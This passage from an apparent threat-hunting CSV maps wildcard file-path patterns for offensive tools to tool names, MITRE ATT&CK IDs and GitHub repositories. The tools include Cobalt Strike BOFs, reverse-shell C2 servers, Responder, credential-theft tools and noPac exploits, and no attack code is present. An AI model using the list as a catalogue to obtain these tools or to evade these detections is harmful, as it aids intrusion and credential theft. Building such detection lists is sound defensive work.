RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","10","1","47","15","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z" +"*/regsvcs/meterpreter*","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","10","1103","214","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" +"*/regsvr.cmd*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*/regsvr32/shellcode_inject*","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. 
This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","10","1103","214","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" +"*/releases/download/*/abc.exe*","offensive_tool_keyword","TGSThief","get the TGS of a user whose logon session is just present on the computer","T1558 - T1558.003 - T1078 - T1078.005","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/MzHmO/TGSThief","1","1","N/A","9","2","129","18","2023-07-25T05:30:39Z","2023-07-23T07:47:05Z" +"*/releases/latest/download/lse.sh*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","1","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*/Remote/adcs_request/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - 
Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Remote/office_tokens/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Remote/procdump/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - 
T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Remote/ProcessDestroy/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Remote/ProcessListHandles/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 
- T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Remote/schtaskscreate/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - 
Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Remote/schtasksrun/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Remote/setuserpass/","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - 
T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Remote/setuserpass/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" 
+"*/Remote/unexpireuser/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/remote-method-guesser.git*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*/RemoteOps.py*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/remotereg.c*","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","10","10","100","23","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" +"*/remotereg.o*","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 
- T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","10","10","100","23","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" +"*/remoteshell.py*","offensive_tool_keyword","wmiexec2","wmiexec2.0 is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","10","1","2023-05-14T19:44:26Z","2023-02-07T22:10:08Z" +"*/resolveall.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/resources/PROCEXP.sys*","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1107 - T1106 - T1543.004 ","TA0002 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/Yaxser/Backstab","1","1","N/A","N/A","10","1237","216","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z" +"*/resources/selfdestruction*","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" +"*/Responder.git*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*/responder/Responder.conf *","offensive_tool_keyword","responder","LLMNR. 
NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*/Responder/Responder.conf*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*/Responder/Responder.conf*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" +"*/Responder-master.zip*","offensive_tool_keyword","responder","LLMNR. 
NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*/returnvar/wce/*","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","1","N/A","8","4","N/A","N/A","N/A","N/A" +"*/rev_shell.py*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","1","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" +"*/reverse-index.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/reverse-shell-generator*","offensive_tool_keyword","reverse-shell-generator","Hosted Reverse Shell generator with a ton of functionality","T1059 T1071","N/A","N/A","N/A","POST Exploitation tools","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","N/A","10","2272","511","2023-08-12T15:06:21Z","2021-02-27T00:53:13Z" +"*/rexec-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/rfc868-time.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/RGPerson.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*/riak-http-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ricardojba/Invoke-noPac*","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/ricardojba/Invoke-noPac","1","1","N/A","N/A","1","57","12","2023-02-16T10:45:19Z","2021-12-13T19:01:18Z" +"*/ricardojba/noPac*","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/ricardojba/noPac","1","1","N/A","N/A","1","34","5","2021-12-19T17:42:12Z","2021-12-13T18:51:31Z" +"*/rid_hijack.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/ridenum/ridenum.py*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" +"*/Ridter/noPac*","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","1","N/A","N/A","7","643","112","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" +"*/rlogin-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/rmi-dumpregistry.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
